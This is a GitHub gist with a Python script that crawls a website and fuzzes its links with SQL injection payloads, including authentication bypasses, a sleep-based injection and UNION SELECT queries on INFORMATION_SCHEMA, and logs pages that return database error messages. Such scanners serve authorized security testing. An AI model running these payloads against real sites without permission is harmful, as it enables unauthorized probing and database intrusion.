Skip to content

Instantly share code, notes, and snippets.

@lukeswitz
Last active June 21, 2023 07:30
Show Gist options
  • Save lukeswitz/f9e3b7dbd81d70fa75ab187e1d818d46 to your computer and use it in GitHub Desktop.
Save lukeswitz/f9e3b7dbd81d70fa75ab187e1d818d46 to your computer and use it in GitHub Desktop.
InjectDetect
#!/usr/bin/env python3
import requests
from urllib.parse import urljoin
from bs4 import BeautifulSoup
import logging
import time
import csv
# Set up logging
logging.basicConfig(filename='sqli_detection.log', level=logging.INFO)
# Define base URL
base_url = "http://example.com"
# Define payloads
payloads = [
"' OR '1'='1'--", "' OR sleep(10)--", "' OR 1=1#", "' OR 2=2#",
"admin' --", "admin' #", "' OR 'a'='a", "\" OR \"a\"=\"a",
"') OR ('a'='a", "' OR 'x'='x", "0' OR '0'='0", "'||'a'||'",
"' OR 'a'='a", "' OR 1=1--", "' OR 'a'='a", "\" OR \"a\"=\"a",
"') OR ('a'='a", "' OR 'x'='x", "0' OR '0'='0", "admin'/*",
"' OR 'text' LIKE 't%'", "' OR 'text' = N'text'",
"' OR 2 BETWEEN 1 AND 3", "' OR 'text' > 't'",
"' OR 'text' < 'u'", "' OR ASCII('text') > 100",
"' OR 'text' || 'a' = 'texta'", "' UNION SELECT 'a', 'b', 'c'",
"' UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES",
# Add more payloads as needed
]
# Define SQLi error messages
sqli_errors = [
"you have an error in your sql syntax", "warning: mysql",
"unclosed quotation mark", "adodb.field error",
"mysql_fetch_array()", "syntax error",
# Add more SQLi error messages if here ...
]
# Extract all links
def get_all_links(url):
try:
soup = BeautifulSoup(requests.get(url, headers={'User-Agent': 'Mozilla/5.0'}).content, "html.parser")
for link in soup.find_all("a"):
href = link.get("href")
if href:
yield urljoin(url, href)
except Exception as e:
logging.error(f"Failed to get links from {url}: {e}")
# Validate if response contains SQLi error
def is_vulnerable(response):
lower_case_response = response.lower()
for error in sqli_errors:
if error in lower_case_response:
return True
return False
# Fuzz each URL with payloads
def fuzz_url(url):
for payload in payloads:
fuzzed_url = url.replace("FUZZ", payload)
try:
response = requests.get(fuzzed_url, headers={'User-Agent': 'Mozilla/5.0'}).text
if is_vulnerable(response):
logging.info(f"Potential vulnerability found at {url} with payload {payload}")
with open('vulnerable_urls.csv', 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow([url, payload])
time.sleep(1) # rate limit
except Exception as e:
logging.error(f"Failed to fuzz {url}: {e}")
# Crawl the website and fuzz each URL
for url in get_all_links(base_url):
fuzz_url(url)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment